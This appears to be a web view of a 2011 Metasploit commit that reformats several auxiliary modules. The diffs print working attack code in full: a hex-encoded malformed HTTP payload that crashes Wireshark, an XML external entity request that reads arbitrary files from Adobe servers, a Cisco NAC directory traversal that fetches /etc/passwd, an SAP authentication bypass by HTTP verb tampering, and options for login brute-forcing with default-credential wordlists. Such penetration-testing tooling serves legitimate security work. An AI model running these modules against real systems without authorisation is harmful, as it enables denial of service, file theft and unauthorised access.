adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions 9 Packages Projects Releases Wiki Activity

big msftidy pass, ping me if there are issues

Browse Source 
git-svn-id: file:///home/svn/framework3/trunk@14034 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
Joshua Drake
2011-10-23 11:56:13 +00:00
parent 5caaedca7a
commit 62c8c6ea9f
160 changed files with 2626 additions and 2405 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/auxiliary/dos/wireshark/chunked.rb
+50 -2
View File
@@ -57,8 +57,56 @@ class Metasploit3 < Msf::Auxiliary
p.tcp_sport = datastore['SPORT'].to_i
p.tcp_window = 3072
# That's some mighty fine ASCII right there.
p.payload = "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75\x6e\x64\x0d\x0a\x44\x61\x74\x65\x3a\x20\x54\x68\x75\x2c\x20\x32\x32\x20\x46\x65\x62\x20\x32\x30\x30\x37\x20\x32\x31\x3a\x35\x39\x3a\x30\x33\x20\x47\x4d\x54\x0d\x0a\x53\x65\x72\x76\x65\x72\x3a\x20\x41\x70\x61\x63\x68\x65\x2f\x31\x2e\x33\x2e\x33\x37\x20\x28\x55\x6e\x69\x78\x29\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x20\x6d\x6f\x64\x5f\x74\x68\x72\x6f\x74\x74\x6c\x65\x2f\x33\x2e\x31\x2e\x32\x20\x6d\x6f\x64\x5f\x70\x73\x6f\x66\x74\x5f\x74\x72\x61\x66\x66\x69\x63\x2f\x30\x2e\x31\x20\x6d\x6f\x64\x5f\x73\x73\x6c\x2f\x32\x2e\x38\x2e\x32\x38\x20\x4f\x70\x65\x6e\x53\x53\x4c\x2f\x30\x2e\x39\x2e\x36\x62\x20\x46\x72\x6f\x6e\x74\x50\x61\x67\x65\x2f\x35\x2e\x30\x2e\x32\x2e\x32\x36\x33\x35\x0d\x0a\x58\x2d\x50\x6f\x77\x65\x72\x65\x64\x2d\x42\x79\x3a\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x0d\x0a\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x0d\x0a\x50\x33\x50\x3a\x20\x70\x6f\x6c\x69\x63\x79\x72\x65\x66\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x77\x33\x63\x2f\x70\x33\x70\x2e\x78\x6d\x6c\x22\x2c\x20\x43\x50\x3d\x22\x4e\x4f\x49\x20\x44\x53\x50\x20\x43\x4f\x52\x20\x4e\x49\x44\x20\x41\x44\x4d\x20\x44\x45\x56\x20\x50\x53\x41\x20\x4f\x55\x52\x20\x49\x4e\x44\x20\x55\x4e\x49\x20\x50\x55\x52\x20\x43\x4f\x4d\x20\x4e\x41\x56\x20\x49\x4e\x54\x20\x53\x54\x41\x22\x0d\x0a\x45\x78\x70\x69\x72\x65\x73\x3a\x20\x54\x68\x75\x2c\x20\x31\x39\x20\x4e\x6f\x76\x20\x31\x39\x38\x31\x20\x30\x38\x3a\x35\x32\x3a\x30\x30\x20\x47\x4d\x54\x0d\x0a\x50\x72\x61\x67\x6d\x61\x3a\x20\x6e\x6f\x2d\x63\x61\x63\x68\x65\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x61\x74\x74\x61\x63\x68\x6d\x65\x6e\x74\x3b\x20\x66\x69\x6c\x65\x6e\x61\x6d\x65\x3d\x53\x74\x61\x74\x43\x6f\x75\x6e\x74\x65\x72\x2d\x4c\x6f\x67\x2d\x32\x32\x38\x37\x35\x39\x32\x2e\x63\x73\x76\x0d\x0a\x53\x65\x74\x2d\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x50\x48\x50\x53\x45\x53\x53\x49\x44\x3d\x64\x37\x35\x65\x64\x39\x37\x36\x66\x30\x30\x39\x64\x61\x31\x31\x38\x65\x62\x36\x31\x34\x62\x39\x38\x66\x64\x35\x62\x39\x31\x36\x25\x33\x42\x2b\x70\x61\x74\x68\x25\x33\x44\x25\x32\x46\x0d\x0a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x3a\x20\x74\x69\x6d\x65\x6f\x75\x74\x3d\x31\x35\x2c\x20\x6d\x61\x78\x3d\x31\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x54\x72\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a\x20\x63\x68\x75\x6e\x6b\x65\x64\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d\x0d\x0a\x0d\x0a\x30\x0d\x0a\x0d\x0a"
# The following hex blob contains an HTTP response with a chunked-encoding
# length of 0. The ASCII version is below in a block comment.
#
# We represent it like this to prevent tools from mangling the carriage
# returns within it.
#
p.payload = "\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x33\x30\x32\x20\x46\x6f\x75" +
"\x6e\x64\x0d\x0a\x44\x61\x74\x65\x3a\x20\x54\x68\x75\x2c\x20\x32" +
"\x32\x20\x46\x65\x62\x20\x32\x30\x30\x37\x20\x32\x31\x3a\x35\x39" +
"\x3a\x30\x33\x20\x47\x4d\x54\x0d\x0a\x53\x65\x72\x76\x65\x72\x3a" +
"\x20\x41\x70\x61\x63\x68\x65\x2f\x31\x2e\x33\x2e\x33\x37\x20\x28" +
"\x55\x6e\x69\x78\x29\x20\x50\x48\x50\x2f\x34\x2e\x34\x2e\x34\x20" +
"\x6d\x6f\x64\x5f\x74\x68\x72\x6f\x74\x74\x6c\x65\x2f\x33\x2e\x31" +
"\x2e\x32\x20\x6d\x6f\x64\x5f\x70\x73\x6f\x66\x74\x5f\x74\x72\x61" +
"\x66\x66\x69\x63\x2f\x30\x2e\x31\x20\x6d\x6f\x64\x5f\x73\x73\x6c" +
"\x2f\x32\x2e\x38\x2e\x32\x38\x20\x4f\x70\x65\x6e\x53\x53\x4c\x2f" +
"\x30\x2e\x39\x2e\x36\x62\x20\x46\x72\x6f\x6e\x74\x50\x61\x67\x65" +
"\x2f\x35\x2e\x30\x2e\x32\x2e\x32\x36\x33\x35\x0d\x0a\x58\x2d\x50" +
"\x6f\x77\x65\x72\x65\x64\x2d\x42\x79\x3a\x20\x50\x48\x50\x2f\x34" +
"\x2e\x34\x2e\x34\x0d\x0a\x4c\x6f\x63\x61\x74\x69\x6f\x6e\x3a\x20" +
"\x68\x74\x74\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31" +
"\x2f\x69\x6e\x64\x65\x78\x2e\x68\x74\x6d\x6c\x0d\x0a\x50\x33\x50" +
"\x3a\x20\x70\x6f\x6c\x69\x63\x79\x72\x65\x66\x3d\x22\x68\x74\x74" +
"\x70\x3a\x2f\x2f\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x2f\x77\x33" +
"\x63\x2f\x70\x33\x70\x2e\x78\x6d\x6c\x22\x2c\x20\x43\x50\x3d\x22" +
"\x4e\x4f\x49\x20\x44\x53\x50\x20\x43\x4f\x52\x20\x4e\x49\x44\x20" +
"\x41\x44\x4d\x20\x44\x45\x56\x20\x50\x53\x41\x20\x4f\x55\x52\x20" +
"\x49\x4e\x44\x20\x55\x4e\x49\x20\x50\x55\x52\x20\x43\x4f\x4d\x20" +
"\x4e\x41\x56\x20\x49\x4e\x54\x20\x53\x54\x41\x22\x0d\x0a\x45\x78" +
"\x70\x69\x72\x65\x73\x3a\x20\x54\x68\x75\x2c\x20\x31\x39\x20\x4e" +
"\x6f\x76\x20\x31\x39\x38\x31\x20\x30\x38\x3a\x35\x32\x3a\x30\x30" +
"\x20\x47\x4d\x54\x0d\x0a\x50\x72\x61\x67\x6d\x61\x3a\x20\x6e\x6f" +
"\x2d\x63\x61\x63\x68\x65\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d" +
"\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a\x20\x61\x74\x74" +
"\x61\x63\x68\x6d\x65\x6e\x74\x3b\x20\x66\x69\x6c\x65\x6e\x61\x6d" +
"\x65\x3d\x53\x74\x61\x74\x43\x6f\x75\x6e\x74\x65\x72\x2d\x4c\x6f" +
"\x67\x2d\x32\x32\x38\x37\x35\x39\x32\x2e\x63\x73\x76\x0d\x0a\x53" +
"\x65\x74\x2d\x43\x6f\x6f\x6b\x69\x65\x3a\x20\x50\x48\x50\x53\x45" +
"\x53\x53\x49\x44\x3d\x64\x37\x35\x65\x64\x39\x37\x36\x66\x30\x30" +
"\x39\x64\x61\x31\x31\x38\x65\x62\x36\x31\x34\x62\x39\x38\x66\x64" +
"\x35\x62\x39\x31\x36\x25\x33\x42\x2b\x70\x61\x74\x68\x25\x33\x44" +
"\x25\x32\x46\x0d\x0a\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x3a" +
"\x20\x74\x69\x6d\x65\x6f\x75\x74\x3d\x31\x35\x2c\x20\x6d\x61\x78" +
"\x3d\x31\x30\x30\x0d\x0a\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e" +
"\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69\x76\x65\x0d\x0a\x54\x72" +
"\x61\x6e\x73\x66\x65\x72\x2d\x45\x6e\x63\x6f\x64\x69\x6e\x67\x3a" +
"\x20\x63\x68\x75\x6e\x6b\x65\x64\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" +
"\x74\x2d\x54\x79\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74" +
"\x69\x6f\x6e\x2f\x6f\x63\x74\x65\x74\x2d\x73\x74\x72\x65\x61\x6d" +
"\x0d\x0a\x0d\x0a\x30\x0d\x0a\x0d\x0a"
p.recalc
capture_sendto(p, rhost)
modules/auxiliary/scanner/http/adobe_xml_inject.rb
+9 -1
View File
@@ -64,7 +64,15 @@ class Metasploit3 < Msf::Auxiliary
"/lcds-samples/messagebroker/httpsecure", # LCDS -- SSL
]
postrequest = "<\?xml version=\"1.0\" encoding=\"utf-8\"\?><\!DOCTYPE test [ <\!ENTITY x3 SYSTEM \"#{datastore['FILE']}\"> ]><amfx ver=\"3\" xmlns=\"http://www.macromedia.com/2005/amfx\"><body><object type=\"flex.messaging.messages.CommandMessage\"><traits><string>body</string><string>clientId</string><string>correlationId</string><string>destination</string><string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string><string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object><traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string><int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>"
postrequest = "<\?xml version=\"1.0\" encoding=\"utf-8\"\?>"
postrequest << "<\!DOCTYPE test [ <\!ENTITY x3 SYSTEM \"#{datastore['FILE']}\"> ]>"
postrequest << "<amfx ver=\"3\" xmlns=\"http://www.macromedia.com/2005/amfx\">"
postrequest << "<body><object type=\"flex.messaging.messages.CommandMessage\"><traits>"
postrequest << "<string>body</string><string>clientId</string><string>correlationId</string><string>destination</string>"
postrequest << "<string>headers</string><string>messageId</string><string>operation</string><string>timestamp</string>"
postrequest << "<string>timeToLive</string></traits><object><traits /></object><null /><string /><string /><object>"
postrequest << "<traits><string>DSId</string><string>DSMessagingVersion</string></traits><string>nil</string>"
postrequest << "<int>1</int></object><string>&x3;</string><int>5</int><int>0</int><int>0</int></object></body></amfx>"
path.each do | check |
modules/auxiliary/scanner/http/cisco_nac_manager_traversal.rb
+83 -83
View File
@@ -1,84 +1,84 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::WMAPScanServer
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Cisco Network Access Manager Directory Traversal Vulnerability',
'Version' => '$Revision$',
'Description' => %q{
This module tests whether a directory traversal vulnerablity is present
in versions of Cisco Network Access Manager 4.8.x You may wish to change
FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment.
},
'References' =>
[
[ 'CVE', '2011-3305' ],
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::WMAPScanServer
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Cisco Network Access Manager Directory Traversal Vulnerability',
'Version' => '$Revision$',
'Description' => %q{
This module tests whether a directory traversal vulnerablity is present
in versions of Cisco Network Access Manager 4.8.x You may wish to change
FILE (e.g. passwd or hosts), MAXDIRS and RPORT depending on your environment.
},
'References' =>
[
[ 'CVE', '2011-3305' ],
[ 'OSVDB', '76080'],
[ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20111005-nac.shtml' ],
[ 'URL', 'http://dev.metasploit.com/redmine/issues/5673' ]
],
'Author' => [ 'nenad' ],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(443),
OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),
OptInt.new('MAXDIRS', [ true, 'The maximum directory depth to search', 7]),
], self.class)
end
def run_host(ip)
traversal = '../../'
part1= '/admin/file_download?tag='
part2 = '&fileType=snapshot'
begin
print_status("Attempting to connect to #{rhost}:#{rport}")
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/admin',
}, 25)
if (res)
1.upto(datastore['MAXDIRS']) do |level|
try = traversal * level
traversalstring = part1 + try + datastore['FILE'] + part2
res = send_request_raw(
{
'method' => 'GET',
'uri' => traversalstring,
}, 25)
if (res and res.code == 200)
print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}!\r\n Response: \r\n#{res.body}")
break
elsif (res and res.code)
print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}\r\n")
end
end
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
[ 'URL', 'http://www.cisco.com/warp/public/707/cisco-sa-20111005-nac.shtml' ],
[ 'URL', 'http://dev.metasploit.com/redmine/issues/5673' ]
],
'Author' => [ 'nenad' ],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(443),
OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),
OptInt.new('MAXDIRS', [ true, 'The maximum directory depth to search', 7]),
], self.class)
end
def run_host(ip)
traversal = '../../'
part1= '/admin/file_download?tag='
part2 = '&fileType=snapshot'
begin
print_status("Attempting to connect to #{rhost}:#{rport}")
res = send_request_raw(
{
'method' => 'GET',
'uri' => '/admin',
}, 25)
if (res)
1.upto(datastore['MAXDIRS']) do |level|
try = traversal * level
traversalstring = part1 + try + datastore['FILE'] + part2
res = send_request_raw(
{
'method' => 'GET',
'uri' => traversalstring,
}, 25)
if (res and res.code == 200)
print_status("Request ##{level} may have succeeded on #{rhost}:#{rport}!\r\n Response: \r\n#{res.body}")
break
elsif (res and res.code)
print_error("Attempt ##{level} returned HTTP error #{res.code} on #{rhost}:#{rport}\r\n")
end
end
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
rescue ::Timeout::Error, ::Errno::EPIPE
end
end
end
modules/auxiliary/scanner/http/dir_webdav_unicode_bypass.rb
+3 -1
View File
@@ -124,7 +124,9 @@ class Metasploit3 < Msf::Auxiliary
return if not conn
webdav_req = %q|<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/><getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/><checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>|
webdav_req = '<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/>' +
'<getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/>' +
'<checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>'
File.open(datastore['DICTIONARY'], 'rb').each do |testf|
begin
modules/auxiliary/scanner/http/ms09_020_webdav_unicode_bypass.rb
+3 -1
View File
@@ -59,7 +59,9 @@ class Metasploit3 < Msf::Auxiliary
vhost = datastore['VHOST'] || wmap_target_host
prot = datastore['SSL'] ? 'https' : 'http'
webdav_req = %q|<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/><getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/><checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>|
webdav_req = '<?xml version="1.0" encoding="utf-8"?><propfind xmlns="DAV:"><prop><getcontentlength xmlns="DAV:"/>' +
'<getlastmodified xmlns="DAV:"/><executable xmlns="http://apache.org/dav/props/"/><resourcetype xmlns="DAV:"/>' +
'<checked-in xmlns="DAV:"/><checked-out xmlns="DAV:"/></prop></propfind>'
begin
res = send_request_cgi({
modules/auxiliary/scanner/http/scraper.rb
Executable → Regular
+2 -2
View File
@@ -1,5 +1,5 @@
##
# $Id: $
# $Id$
##
##
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'HTTP Page Scraper',
'Version' => '$Revision: 13183 $',
'Version' => '$Revision$',
'Description' => 'Scrap defined data from a specific web page based on a regular expresion',
'Author' => ['et'],
'License' => MSF_LICENSE
modules/auxiliary/scanner/oracle/isqlplus_login.rb
+2 -1
View File
@@ -46,7 +46,8 @@ class Metasploit3 < Msf::Auxiliary
OptString.new('URI', [ true, 'Oracle iSQLPlus path.', '/isqlplus/']),
OptString.new('SID', [ false, 'Oracle SID' ]),
OptInt.new('TIMEOUT', [false, 'Time to wait for HTTP responses', 60]),
OptPath.new('USERPASS_FILE', [ false, "File containing users and passwords separated by space, one pair per line", File.join(Msf::Config.install_root, "data", "wordlists", "oracle_default_userpass.txt") ]),
OptPath.new('USERPASS_FILE', [ false, "File containing users and passwords separated by space, one pair per line",
File.join(Msf::Config.install_root, "data", "wordlists", "oracle_default_userpass.txt") ]),
OptBool.new('USER_AS_PASS', [ false, "Try the username as the password for all users", false]),
], self.class)
modules/auxiliary/scanner/postgres/postgres_login.rb
+6 -3
View File
@@ -40,9 +40,12 @@ class Metasploit3 < Msf::Auxiliary
register_options(
[
OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line", File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_userpass.txt") ]),
OptPath.new('USER_FILE', [ false, "File containing users, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_user.txt") ]),
OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line", File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_pass.txt") ]),
OptPath.new('USERPASS_FILE', [ false, "File containing (space-seperated) users and passwords, one pair per line",
File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_userpass.txt") ]),
OptPath.new('USER_FILE', [ false, "File containing users, one per line",
File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_user.txt") ]),
OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
File.join(Msf::Config.install_root, "data", "wordlists", "postgres_default_pass.txt") ]),
], self.class)
deregister_options('SQL')
modules/auxiliary/scanner/sap/sap_icm_urlscan.rb
+157 -157
View File
@@ -1,157 +1,157 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'rex/proto/http'
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'SAP URL Scanner',
'Description' => %q{
This module scans for commonly found SAP Internet Communication Manager URLs
and outputs return codes for the user.
},
'Version' => '$Revision$',
'Author' => [ 'Chris John Riley' ],
'References' =>
[
[ 'CVE', '2010-0738' ] # VERB auth bypass
],
'License' => MSF_LICENSE
))
register_options(
[
OptString.new('VERB', [true, "Verb for auth bypass testing", "HEAD"]),
OptString.new('URLFILE', [true, "SAP ICM Paths File", "sap_icm_paths.txt"])
], self.class)
end
# Base Structure of module borrowed from jboss_vulnscan
def run_host(ip)
# If URLFILE is set empty, obviously the user made a silly mistake
if datastore['URLFILE'].empty?
print_error("Please specify a URLFILE")
return
end
# Initialize the actual URLFILE path
if datastore['URLFILE'] == "sap_icm_paths.txt"
url_file = "#{Msf::Config.data_directory}/wordlists/#{datastore['URLFILE']}"
else
# Not the default sap_icm_paths file
url_file = datastore['URLFILE']
end
# If URLFILE path doesn't exist, no point to continue the rest of the script
if not File.exists?(url_file)
print_error("Required URL list #{url_file} was not found")
return
end
res = send_request_cgi(
{
'uri' => "/" + Rex::Text.rand_text_alpha(12),
'method' => 'GET',
'ctype' => 'text/plain',
}, 20)
if res
print_status("Note: Please note these URLs may or may not be of interest based on server configuration")
@info = []
if not res.headers['Server'].nil?
@info << res.headers['Server']
print_status("#{rhost}:#{rport} Server responded with the following Server Header: #{@info[0]}")
else
print_status("#{rhost}:#{rport} Server responded with a blank or missing Server Header")
end
if (res.body and /class="note">(.*)code:(.*)</i.match(res.body) )
print_error("#{rhost}:#{rport} SAP ICM error message: #{$2}")
end
# Load URLs
urls_to_check = []
f = File.open(url_file)
f.each_line do |line|
urls_to_check.push line
end
print_status("#{rhost}:#{rport} Beginning URL check")
urls_to_check.each do |url|
check_url(url.strip)
end
else
print_error("#{rhost}:#{rport} No response received")
end
end
def check_url(url)
res = send_request_cgi({
'uri' => url,
'method' => 'GET',
'ctype' => 'text/plain',
}, 20)
if (res)
if not @info.include?(res.headers['Server']) and not res.headers['Server'].nil?
print_good("New server header seen [#{res.headers['Server']}]")
@info << res.headers['Server'] #Add To seen server headers
end
case
when res.code == 200
print_good("#{rhost}:#{rport} #{url} - does not require authentication (200)")
when res.code == 403
print_good("#{rhost}:#{rport} #{url} - restricted (403)")
when res.code == 401
print_good("#{rhost}:#{rport} #{url} - requires authentication (401): #{res.headers['WWW-Authenticate']}")
# Attempt verb tampering bypass
bypass_auth(url)
when res.code == 404
# Do not return by default, only display in verbose mode
vprint_status("#{rhost}:#{rport} #{url.strip} - not found (404)")
when res.code == 500
print_good("#{rhost}:#{rport} #{url} - produced a server error (500)")
when res.code == 301, res.code == 302
print_good("#{rhost}:#{rport} #{url} - redirected (#{res.code}) to #{res.headers['Location']} (not following)")
else
print_status("#{rhost}:#{rport} - unhandle response code #{res.code}")
end
else
print_status("#{rhost}:#{rport} #{url} - not found (No Repsonse code Received)")
end
end
def bypass_auth(url)
print_status("#{rhost}:#{rport} Check for verb tampering (#{datastore['VERB']})")
res = send_request_raw({
'uri' => url,
'method' => datastore['VERB'],
'version' => '1.0' # 1.1 makes the head request wait on timeout for some reason
}, 20)
if (res and res.code == 200)
print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering")
else
print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering")
end
end
end
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'rex/proto/http'
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'SAP URL Scanner',
'Description' => %q{
This module scans for commonly found SAP Internet Communication Manager URLs
and outputs return codes for the user.
},
'Version' => '$Revision$',
'Author' => [ 'Chris John Riley' ],
'References' =>
[
[ 'CVE', '2010-0738' ] # VERB auth bypass
],
'License' => MSF_LICENSE
))
register_options(
[
OptString.new('VERB', [true, "Verb for auth bypass testing", "HEAD"]),
OptString.new('URLFILE', [true, "SAP ICM Paths File", "sap_icm_paths.txt"])
], self.class)
end
# Base Structure of module borrowed from jboss_vulnscan
def run_host(ip)
# If URLFILE is set empty, obviously the user made a silly mistake
if datastore['URLFILE'].empty?
print_error("Please specify a URLFILE")
return
end
# Initialize the actual URLFILE path
if datastore['URLFILE'] == "sap_icm_paths.txt"
url_file = "#{Msf::Config.data_directory}/wordlists/#{datastore['URLFILE']}"
else
# Not the default sap_icm_paths file
url_file = datastore['URLFILE']
end
# If URLFILE path doesn't exist, no point to continue the rest of the script
if not File.exists?(url_file)
print_error("Required URL list #{url_file} was not found")
return
end
res = send_request_cgi(
{
'uri' => "/" + Rex::Text.rand_text_alpha(12),
'method' => 'GET',
'ctype' => 'text/plain',
}, 20)
if res
print_status("Note: Please note these URLs may or may not be of interest based on server configuration")
@info = []
if not res.headers['Server'].nil?
@info << res.headers['Server']
print_status("#{rhost}:#{rport} Server responded with the following Server Header: #{@info[0]}")
else
print_status("#{rhost}:#{rport} Server responded with a blank or missing Server Header")
end
if (res.body and /class="note">(.*)code:(.*)</i.match(res.body) )
print_error("#{rhost}:#{rport} SAP ICM error message: #{$2}")
end
# Load URLs
urls_to_check = []
f = File.open(url_file)
f.each_line do |line|
urls_to_check.push line
end
print_status("#{rhost}:#{rport} Beginning URL check")
urls_to_check.each do |url|
check_url(url.strip)
end
else
print_error("#{rhost}:#{rport} No response received")
end
end
def check_url(url)
res = send_request_cgi({
'uri' => url,
'method' => 'GET',
'ctype' => 'text/plain',
}, 20)
if (res)
if not @info.include?(res.headers['Server']) and not res.headers['Server'].nil?
print_good("New server header seen [#{res.headers['Server']}]")
@info << res.headers['Server'] #Add To seen server headers
end
case
when res.code == 200
print_good("#{rhost}:#{rport} #{url} - does not require authentication (200)")
when res.code == 403
print_good("#{rhost}:#{rport} #{url} - restricted (403)")
when res.code == 401
print_good("#{rhost}:#{rport} #{url} - requires authentication (401): #{res.headers['WWW-Authenticate']}")
# Attempt verb tampering bypass
bypass_auth(url)
when res.code == 404
# Do not return by default, only display in verbose mode
vprint_status("#{rhost}:#{rport} #{url.strip} - not found (404)")
when res.code == 500
print_good("#{rhost}:#{rport} #{url} - produced a server error (500)")
when res.code == 301, res.code == 302
print_good("#{rhost}:#{rport} #{url} - redirected (#{res.code}) to #{res.headers['Location']} (not following)")
else
print_status("#{rhost}:#{rport} - unhandle response code #{res.code}")
end
else
print_status("#{rhost}:#{rport} #{url} - not found (No Repsonse code Received)")
end
end
def bypass_auth(url)
print_status("#{rhost}:#{rport} Check for verb tampering (#{datastore['VERB']})")
res = send_request_raw({
'uri' => url,
'method' => datastore['VERB'],
'version' => '1.0' # 1.1 makes the head request wait on timeout for some reason
}, 20)
if (res and res.code == 200)
print_good("#{rhost}:#{rport} Got authentication bypass via HTTP verb tampering")
else
print_status("#{rhost}:#{rport} Could not get authentication bypass via HTTP verb tampering")
end
end
end
modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb
Executable → Regular
View File
modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb
Executable → Regular
View File
modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb
Executable → Regular
View File
modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb
Executable → Regular
View File
modules/auxiliary/scanner/sap/sap_mgmt_con_getlogfiles.rb
Executable → Regular
View File
modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb
+192 -192
View File
@@ -1,192 +1,192 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit4 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'SAP Management Console Get Process Parameters',
'Version' => '$Revision$',
'Description' => %q{
This module simply attempts to output a SAP process parameters and
configuration settings through the SAP Management Console SOAP Interface.
},
'References' =>
[
# General
[ 'URL', 'http://blog.c22.cc' ]
],
'Author' => [ 'Chris John Riley' ],
'License' => MSF_LICENSE
)
register_options(
[
Opt::RPORT(50013),
OptString.new('URI', [false, 'Path to the SAP Management Console ', '/']),
OptString.new('MATCH', [false, 'Display matches e.g login/', '']),
], self.class)
register_autofilter_ports([ 50013 ])
deregister_options('RHOST')
end
def rport
datastore['RPORT']
end
def run_host(ip)
res = send_request_cgi({
'uri' => "/#{datastore['URI']}",
'method' => 'GET',
'headers' =>
{
'User-Agent' => datastore['UserAgent']
}
}, 25)
if not res
print_error("#{rhost}:#{rport} [SAP] Unable to connect")
return
end
getprocparam(ip)
end
def getprocparam(rhost)
verbose = datastore['VERBOSE']
